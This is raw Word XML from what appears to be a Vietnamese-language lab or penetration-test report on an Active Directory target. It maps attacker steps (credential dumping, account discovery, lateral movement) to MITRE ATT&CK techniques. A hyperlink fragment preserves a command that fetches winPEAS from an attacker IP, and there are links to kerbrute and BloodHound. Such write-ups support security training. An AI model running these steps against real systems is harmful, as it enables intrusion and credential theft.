          <w:p w14:paraId="49F055FE" w14:textId="77777777" w:rsidR="00472ECA" w:rsidRPr="00147C0B" w:rsidRDefault="00472ECA" w:rsidP="00F22B80">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Procedure(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00472ECA" w:rsidRPr="00147C0B" w14:paraId="4AD48636" w14:textId="77777777" w:rsidTr="00F22B80">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70B1E0DF" w14:textId="451F7331" w:rsidR="00472ECA" w:rsidRPr="00BD400A" w:rsidRDefault="00472ECA" w:rsidP="00F22B80">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00472ECA">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OS Credential Dumping</w:t>
            </w:r>
            <w:r w:rsidRPr="00472ECA">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidRPr="00223CEB">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>00</w:t>
              </w:r>
              <w:r w:rsidRPr="00223CEB">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>3</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="730CBDA6" w14:textId="2BC9522A" w:rsidR="00472ECA" w:rsidRPr="00ED0BCC" w:rsidRDefault="00ED0BCC" w:rsidP="00F22B80">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Dump</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> thông tin hash của các user khác từ user đã chiếm được quyền. Dẫn đến nhưng user quyền cao cũng bị chiếm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="498B038D" w14:textId="0F0E23AD" w:rsidR="00BA42FD" w:rsidRPr="005A5EA7" w:rsidRDefault="00BA42FD" w:rsidP="00BA42FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc152522896"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA42FD">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Discovery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42FD" w:rsidRPr="00147C0B" w14:paraId="3A4A4230" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75141714" w14:textId="77777777" w:rsidR="00BA42FD" w:rsidRPr="00147C0B" w:rsidRDefault="00BA42FD" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Threat Actor Technique / Sub-Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC658D2" w14:textId="77777777" w:rsidR="00BA42FD" w:rsidRPr="00147C0B" w:rsidRDefault="00BA42FD" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Procedure(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA42FD" w:rsidRPr="001313AB" w14:paraId="4B2440C0" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD9F35E" w14:textId="28CDA1E5" w:rsidR="00BA42FD" w:rsidRPr="00B93EEF" w:rsidRDefault="00BD400A" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Account </w:t>
            </w:r>
            <w:r w:rsidR="00B93EEF">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
            <w:r w:rsidR="00B93EEF">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:hyperlink r:id="rId35" w:history="1">
              <w:r w:rsidR="00B93EEF" w:rsidRPr="00B93EEF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="22"/>
                  <w:lang w:val="vi-VN"/>
                </w:rPr>
                <w:t>T1087</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B93EEF">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5A4560" w14:textId="3378B70D" w:rsidR="00BA42FD" w:rsidRPr="006C33D7" w:rsidRDefault="00BA42FD" w:rsidP="003266BE">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B93EEF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D24E34" w:rsidRPr="00B93EEF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Kẻ</w:t>
            </w:r>
            <w:r w:rsidR="00D24E34">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> tấn công thu thập những thông tin credentials </w:t>
            </w:r>
            <w:r w:rsidR="006C33D7" w:rsidRPr="006C33D7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>lưu</w:t>
            </w:r>
            <w:r w:rsidR="006C33D7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> trữ trên hệ thống từ winlogon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4137956E" w14:textId="05D0C6F5" w:rsidR="00540FB3" w:rsidRPr="005A5EA7" w:rsidRDefault="00540FB3" w:rsidP="00540FB3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc152522897"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics: </w:t>
      </w:r>
      <w:r w:rsidR="00721520" w:rsidRPr="00721520">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lateral Movement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40FB3" w:rsidRPr="00147C0B" w14:paraId="1B9E88C8" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C6C6FFC" w14:textId="77777777" w:rsidR="00540FB3" w:rsidRPr="00147C0B" w:rsidRDefault="00540FB3" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Technique / Sub-Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3710D3EA" w14:textId="77777777" w:rsidR="00540FB3" w:rsidRPr="00147C0B" w:rsidRDefault="00540FB3" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Procedure(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00540FB3" w:rsidRPr="00147C0B" w14:paraId="1500B44E" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF23327" w14:textId="1841D36A" w:rsidR="00540FB3" w:rsidRPr="00BD400A" w:rsidRDefault="00721520" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00721520">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation of Remote Services</w:t>
            </w:r>
            <w:r w:rsidRPr="00721520">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00540FB3" w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidRPr="00721520">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>T1210</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00540FB3" w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A1387D" w14:textId="6C6B2263" w:rsidR="00540FB3" w:rsidRPr="00D40F16" w:rsidRDefault="00D40F16" w:rsidP="003266BE">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tận</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>dụng dịch vụ điều khiển máy từ xa, kẻ tấn công thực hiện lateral movement từ những user đã chiếm được sang user khác.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DAE6EDC" w14:textId="77777777" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidSect="0040477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724A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B14EA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5F5CD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2409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C60FE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D082BAC"/>
    <w:lvl w:ilvl="0" w:tplc="E77C450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46C47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36CEEB3A"/>
    <w:lvl w:ilvl="0" w:tplc="918C2FD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F1000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21342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C8F"/>
    <w:rsid w:val="00011093"/>
    <w:rsid w:val="00032C03"/>
    <w:rsid w:val="0005243D"/>
    <w:rsid w:val="0005295A"/>
    <w:rsid w:val="000573C7"/>
    <w:rsid w:val="000611EC"/>
    <w:rsid w:val="00062ACA"/>
    <w:rsid w:val="00066D50"/>
    <w:rsid w:val="0007453A"/>
    <w:rsid w:val="000A738A"/>
    <w:rsid w:val="000D0CC1"/>
    <w:rsid w:val="000D5854"/>
    <w:rsid w:val="000E21CB"/>
    <w:rsid w:val="000F0071"/>
    <w:rsid w:val="001313AB"/>
    <w:rsid w:val="00147C0B"/>
    <w:rsid w:val="001917D4"/>
    <w:rsid w:val="00192345"/>
    <w:rsid w:val="001B5ED8"/>
    <w:rsid w:val="001C2950"/>
    <w:rsid w:val="001D1232"/>
    <w:rsid w:val="001E7B37"/>
    <w:rsid w:val="00223CEB"/>
    <w:rsid w:val="00275E5B"/>
    <w:rsid w:val="002A573B"/>
    <w:rsid w:val="002E3000"/>
    <w:rsid w:val="002E4EBA"/>
    <w:rsid w:val="002E72C8"/>
    <w:rsid w:val="00377ED6"/>
    <w:rsid w:val="003A6411"/>
    <w:rsid w:val="003B352E"/>
    <w:rsid w:val="00404771"/>
    <w:rsid w:val="0041773E"/>
    <w:rsid w:val="004455FE"/>
    <w:rsid w:val="004477D4"/>
    <w:rsid w:val="0045616D"/>
    <w:rsid w:val="00472ECA"/>
    <w:rsid w:val="00484B7B"/>
    <w:rsid w:val="005240D1"/>
    <w:rsid w:val="00540FB3"/>
    <w:rsid w:val="00563FCA"/>
    <w:rsid w:val="00570C40"/>
    <w:rsid w:val="005854D2"/>
    <w:rsid w:val="0059743C"/>
    <w:rsid w:val="005A5EA7"/>
    <w:rsid w:val="005A7F90"/>
    <w:rsid w:val="0061181E"/>
    <w:rsid w:val="00617478"/>
    <w:rsid w:val="00624EB0"/>
    <w:rsid w:val="0063447B"/>
    <w:rsid w:val="00656825"/>
    <w:rsid w:val="00661F68"/>
    <w:rsid w:val="00664DEE"/>
    <w:rsid w:val="006661CE"/>
    <w:rsid w:val="00666A7B"/>
    <w:rsid w:val="006B3798"/>
    <w:rsid w:val="006C33D7"/>
    <w:rsid w:val="006D6673"/>
    <w:rsid w:val="00721520"/>
    <w:rsid w:val="00733976"/>
    <w:rsid w:val="007D1A2E"/>
    <w:rsid w:val="007D568C"/>
    <w:rsid w:val="008125CB"/>
    <w:rsid w:val="00835C8F"/>
    <w:rsid w:val="008A165C"/>
    <w:rsid w:val="008D4AF8"/>
    <w:rsid w:val="008E35CB"/>
    <w:rsid w:val="008E7865"/>
    <w:rsid w:val="00916569"/>
    <w:rsid w:val="00920E7C"/>
    <w:rsid w:val="00944977"/>
    <w:rsid w:val="0098182A"/>
    <w:rsid w:val="00984A38"/>
    <w:rsid w:val="009A740C"/>
    <w:rsid w:val="009E35E3"/>
    <w:rsid w:val="009E4898"/>
    <w:rsid w:val="00A7705E"/>
    <w:rsid w:val="00A94766"/>
    <w:rsid w:val="00AD2CBB"/>
    <w:rsid w:val="00B12CC2"/>
    <w:rsid w:val="00B3429F"/>
    <w:rsid w:val="00B635B2"/>
    <w:rsid w:val="00B65F65"/>
    <w:rsid w:val="00B809E1"/>
    <w:rsid w:val="00B91827"/>
    <w:rsid w:val="00B93EEF"/>
    <w:rsid w:val="00BA42FD"/>
    <w:rsid w:val="00BC2AE5"/>
    <w:rsid w:val="00BD400A"/>
    <w:rsid w:val="00C10F6F"/>
    <w:rsid w:val="00C33AFC"/>
    <w:rsid w:val="00C33B27"/>
    <w:rsid w:val="00C60BEF"/>
    <w:rsid w:val="00C652A7"/>
    <w:rsid w:val="00C716FD"/>
    <w:rsid w:val="00C82ABC"/>
    <w:rsid w:val="00CA5002"/>
    <w:rsid w:val="00CD11AD"/>
    <w:rsid w:val="00CD3F05"/>
    <w:rsid w:val="00D01A17"/>
    <w:rsid w:val="00D107DE"/>
    <w:rsid w:val="00D24E34"/>
    <w:rsid w:val="00D267A6"/>
    <w:rsid w:val="00D26A59"/>
    <w:rsid w:val="00D40F16"/>
    <w:rsid w:val="00D450E9"/>
    <w:rsid w:val="00D867A3"/>
    <w:rsid w:val="00D92435"/>
    <w:rsid w:val="00DB12A9"/>
    <w:rsid w:val="00DC5CD7"/>
    <w:rsid w:val="00DE18FE"/>
    <w:rsid w:val="00DF6E3D"/>
    <w:rsid w:val="00E079D3"/>
    <w:rsid w:val="00E20AB8"/>
    <w:rsid w:val="00E33E3D"/>
    <w:rsid w:val="00E67D61"/>
    <w:rsid w:val="00E860D5"/>
    <w:rsid w:val="00E94596"/>
    <w:rsid w:val="00EA514F"/>
    <w:rsid w:val="00ED0BCC"/>
    <w:rsid w:val="00EE06C1"/>
    <w:rsid w:val="00EE7A72"/>
    <w:rsid w:val="00EF22A1"/>
    <w:rsid w:val="00F123C2"/>
    <w:rsid w:val="00F136EF"/>
    <w:rsid w:val="00F44F3A"/>
    <w:rsid w:val="00F80F6D"/>
    <w:rsid w:val="00FA1D96"/>
    <w:rsid w:val="00FB091D"/>
    <w:rsid w:val="00FE30AC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4E002"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CCD65741-D80F-4387-9FA9-CA9D6934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5C8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35C8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35C8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C8F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35C8F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35C8F"/>
    <w:rPr>
      <w:rFonts w:eastAsia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136E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DE18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7F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F9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D585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D58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585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D5854"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="notion-enable-hover">
    <w:name w:val="notion-enable-hover"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00147C0B"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00147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-annotation-unknown-block-id--720375198">
    <w:name w:val="link-annotation-unknown-block-id--720375198"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00147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mailto:Fsmith@EGOTISTICAL-BANK.LOCAL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attack.mitre.org/techniques/T1003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fsmith@EGOTISTICAL-BANK.LOCAL" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595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ropnop/kerbrute" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.readthedocs.io/en/latest/index.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210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10.10.14.25/winPEASx86.exe%20-o%20sheng.exe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hyperlink" Target="https://attack.mitre.org/techniques/T108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B3E47-3D16-44E7-887B-54F764EA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O YUNG SHENG</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>KUO YUNG SHENG</cp:lastModifiedBy>
  <cp:revision>116</cp:revision>
  <cp:lastPrinted>2023-12-01T12:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-01T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-03T12:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>